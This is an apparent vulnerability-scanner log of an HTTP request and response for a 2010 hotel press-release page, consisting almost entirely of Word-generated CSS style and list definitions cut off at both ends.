{mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;}span.1 {mso-style-name:1; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:navy;}ins {mso-style-type:export-only; text-decoration:none;}span.msoIns {mso-style-type:export-only; mso-style-name:""; font-style:italic; color:black;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:244611249; mso-list-type:hybrid; mso-list-template-ids:1415980202 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l5 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l5:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:806508694; mso-list-type:hybrid; mso-list-template-ids:-2137327588 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l8 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l10:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l11 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l12 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l12:level1 {ms..
- /pdfs/press/html/Kimpton-Blog-0910/index.html

/pdfs/press/html/Kimpton-Blog-0910/index.html

http://www.kimptonhotels.com/pdfs/press/html/Kimpton-Blog-0910/index.html

Request

GET /pdfs/press/html/Kimpton-Blog-0910/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34697
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>4</o:TotalTime> <o:LastPrinted>2010-06-08T21:03:00Z</o:LastPrinted> <o:Created>2010-09-22T18:36:00Z</o:Created> <o:LastSaved>2010-09-22T18:36:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>659</o:Words> <o:Characters>3761</o:Characters> <o:Lines>31</o:Lines> <o:Paragraphs>7</o:Paragraphs> <o:CharactersWithSpaces>4618</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;}span.1 {mso-style-name:1; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:navy;}ins {mso-style-type:export-only; text-decoration:none;}span.msoIns {mso-style-type:export-only; mso-style-name:""; font-style:italic; color:black;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:244611249; mso-list-type:hybrid; mso-list-template-ids:1415980202 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l5 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l5:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:806508694; mso-list-type:hybrid; mso-list-template-ids:-2137327588 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level7 